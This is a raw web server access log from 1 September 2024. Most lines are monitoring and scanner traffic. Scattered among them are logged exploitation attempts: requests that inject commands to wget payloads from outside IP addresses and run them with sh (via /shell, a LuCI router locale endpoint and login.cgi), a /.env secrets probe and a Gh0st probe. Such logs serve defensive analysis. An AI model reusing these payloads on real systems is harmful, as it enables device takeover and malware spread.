212.91.246.72 - - [01/Sep/2024:18:08:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:18:09:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:18:10:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
89.190.156.137 - - [01/Sep/2024:18:10:47 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
212.91.246.72 - - [01/Sep/2024:18:11:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:18:12:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:18:13:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:18:14:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
89.190.156.137 - - [01/Sep/2024:18:15:25 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
212.91.246.72 - - [01/Sep/2024:18:15:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:18:16:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:18:17:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:18:18:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:18:19:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
89.190.156.137 - - [01/Sep/2024:18:20:11 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
212.91.246.72 - - [01/Sep/2024:18:20:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:18:21:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:18:22:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
89.190.156.137 - - [01/Sep/2024:18:22:56 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
212.91.246.72 - - [01/Sep/2024:18:23:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:18:24:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.82.77.202 - - [01/Sep/2024:18:25:07 +0200] "GET / HTTP/1.0" 200 1229 "-" "HTC-ST7377/1.59.502.3 (67150) Opera/9.50 (Windows NT 5.1; U; en) UP.Link/6.3.1.17.0"
80.82.77.202 - - [01/Sep/2024:18:25:08 +0200] "GET / HTTP/1.0" 200 1229 "-" "HTC-ST7377/1.59.502.3 (67150) Opera/9.50 (Windows NT 5.1; U; en) UP.Link/6.3.1.17.0"
80.82.77.202 - - [01/Sep/2024:18:25:12 +0200] "GET / HTTP/1.0" 200 1229 "-" "HTC-ST7377/1.59.502.3 (67150) Opera/9.50 (Windows NT 5.1; U; en) UP.Link/6.3.1.17.0"
80.82.77.202 - - [01/Sep/2024:18:25:16 +0200] "GET / HTTP/1.0" 200 1229 "-" "HTC-ST7377/1.59.502.3 (67150) Opera/9.50 (Windows NT 5.1; U; en) UP.Link/6.3.1.17.0"
212.91.246.72 - - [01/Sep/2024:18:25:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.82.77.202 - - [01/Sep/2024:18:25:53 +0200] "GET / HTTP/1.0" 200 1229 "-" "HTC-ST7377/1.59.502.3 (67150) Opera/9.50 (Windows NT 5.1; U; en) UP.Link/6.3.1.17.0"
212.91.246.72 - - [01/Sep/2024:18:26:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:18:27:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:18:28:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:18:29:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:18:30:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:18:31:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:18:32:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:18:33:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:18:34:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
89.190.156.137 - - [01/Sep/2024:18:35:35 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
212.91.246.72 - - [01/Sep/2024:18:35:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:18:36:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:18:37:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:18:38:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:18:39:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:18:40:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:18:41:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
156.220.187.212 - - [01/Sep/2024:18:42:20 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 45.145.165.64/jaws;sh+/tmp/jaws HTTP/1.1" 404 306 "-" "Hello, world"
212.91.246.72 - - [01/Sep/2024:18:42:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:18:43:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
66.240.205.34 - - [01/Sep/2024:18:43:41 +0200] "Gh0st\xad" 501 321 "-" "-"
212.91.246.72 - - [01/Sep/2024:18:44:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:18:45:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:18:46:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
89.190.156.137 - - [01/Sep/2024:18:46:51 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
212.91.246.72 - - [01/Sep/2024:18:47:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:18:48:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.128.59 - - [01/Sep/2024:18:49:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Sep/2024:18:49:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:18:50:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:18:51:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:18:52:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:18:53:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:18:54:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:18:55:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:18:56:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:18:57:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
89.190.156.137 - - [01/Sep/2024:18:58:00 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
212.91.246.72 - - [01/Sep/2024:18:58:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:18:59:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:19:00:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:19:01:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:19:02:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.128.84 - - [01/Sep/2024:19:02:59 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.171%3A88%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
212.91.246.72 - - [01/Sep/2024:19:03:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:19:04:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:19:05:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
89.190.156.137 - - [01/Sep/2024:19:05:46 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
178.254.24.91 - - [01/Sep/2024:19:06:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.54"
212.91.246.72 - - [01/Sep/2024:19:06:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
89.190.156.137 - - [01/Sep/2024:19:07:07 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
185.224.128.84 - - [01/Sep/2024:19:07:34 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.171%3A88%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
212.91.246.72 - - [01/Sep/2024:19:07:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:19:08:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:19:09:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:19:10:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:19:11:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.128.84 - - [01/Sep/2024:19:12:41 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.171%3A88%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
212.91.246.72 - - [01/Sep/2024:19:12:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:19:13:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
89.190.156.137 - - [01/Sep/2024:19:14:10 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
212.91.246.72 - - [01/Sep/2024:19:14:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.128.84 - - [01/Sep/2024:19:15:43 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.171%3A88%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
212.91.246.72 - - [01/Sep/2024:19:15:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.128.84 - - [01/Sep/2024:19:16:25 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.171%3A88%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
212.91.246.72 - - [01/Sep/2024:19:16:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:19:17:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:19:18:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.128.84 - - [01/Sep/2024:19:19:19 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.171%3A88%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
212.91.246.72 - - [01/Sep/2024:19:19:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:19:20:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:19:21:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:19:22:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:19:23:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:19:24:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:19:25:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
154.216.20.249 - - [01/Sep/2024:19:26:31 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
154.216.20.249 - - [01/Sep/2024:19:26:31 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
212.91.246.72 - - [01/Sep/2024:19:26:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.128.84 - - [01/Sep/2024:19:27:27 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.171%3A88%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
212.91.246.72 - - [01/Sep/2024:19:27:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.128.59 - - [01/Sep/2024:19:28:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Sep/2024:19:28:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:19:29:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:19:30:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:19:31:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.128.84 - - [01/Sep/2024:19:32:10 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.171%3A88%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
212.91.246.72 - - [01/Sep/2024:19:32:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
49.51.206.130 - - [01/Sep/2024:19:32:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
212.91.246.72 - - [01/Sep/2024:19:33:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:19:34:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:19:35:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.128.84 - - [01/Sep/2024:19:35:56 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.171%3A88%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
212.91.246.72 - - [01/Sep/2024:19:36:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:19:37:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
89.190.156.137 - - [01/Sep/2024:19:38:37 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
212.91.246.72 - - [01/Sep/2024:19:38:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.128.84 - - [01/Sep/2024:19:39:09 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.171%3A88%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
212.91.246.72 - - [01/Sep/2024:19:39:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
93.174.93.12 - - [01/Sep/2024:19:40:15 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (X11; U; Linux i686; en-us) AppleWebKit/528.5 (KHTML, like Gecko, Safari/528.5 ) lt-GtkLauncher"
89.190.156.137 - - [01/Sep/2024:19:40:26 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
37.139.5.66 - - [01/Sep/2024:19:40:35 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://193.35.18.164/klausschwab.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "linus-torvalds-loves-you"
212.91.246.72 - - [01/Sep/2024:19:40:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
206.168.34.33 - - [01/Sep/2024:19:40:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
93.174.93.12 - - [01/Sep/2024:19:40:56 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (X11; U; Linux i686; en-us) AppleWebKit/528.5 (KHTML, like Gecko, Safari/528.5 ) lt-GtkLauncher"
206.168.34.33 - - [01/Sep/2024:19:40:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
93.174.93.12 - - [01/Sep/2024:19:40:59 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (X11; U; Linux i686; en-us) AppleWebKit/528.5 (KHTML, like Gecko, Safari/528.5 ) lt-GtkLauncher"
206.168.34.33 - - [01/Sep/2024:19:40:59 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
206.168.34.33 - - [01/Sep/2024:19:40:59 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
93.174.93.12 - - [01/Sep/2024:19:41:11 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (X11; U; Linux i686; en-us) AppleWebKit/528.5 (KHTML, like Gecko, Safari/528.5 ) lt-GtkLauncher"
41.234.160.21 - - [01/Sep/2024:19:41:26 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 45.145.165.64/jaws;sh+/tmp/jaws HTTP/1.1" 404 306 "-" "Hello, world"
212.91.246.72 - - [01/Sep/2024:19:41:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.128.59 - - [01/Sep/2024:19:42:19 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.171%3A88%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
93.174.93.12 - - [01/Sep/2024:19:42:27 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (X11; U; Linux i686; en-us) AppleWebKit/528.5 (KHTML, like Gecko, Safari/528.5 ) lt-GtkLauncher"
93.174.93.12 - - [01/Sep/2024:19:42:29 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (X11; U; Linux i686; en-us) AppleWebKit/528.5 (KHTML, like Gecko, Safari/528.5 ) lt-GtkLauncher"
93.174.93.12 - - [01/Sep/2024:19:42:35 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (X11; U; Linux i686; en-us) AppleWebKit/528.5 (KHTML, like Gecko, Safari/528.5 ) lt-GtkLauncher"
212.91.246.72 - - [01/Sep/2024:19:42:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [01/Sep/2024:19:43:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
89.190.156.137 - - [01/Sep/2024:19:43:12 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
212.91.246.72 - - [01/Sep/2024:19:43:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:19:44:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
89.190.156.137 - - [01/Sep/2024:19:45:26 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
212.91.246.72 - - [01/Sep/2024:19:45:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:19:46:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:19:47:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
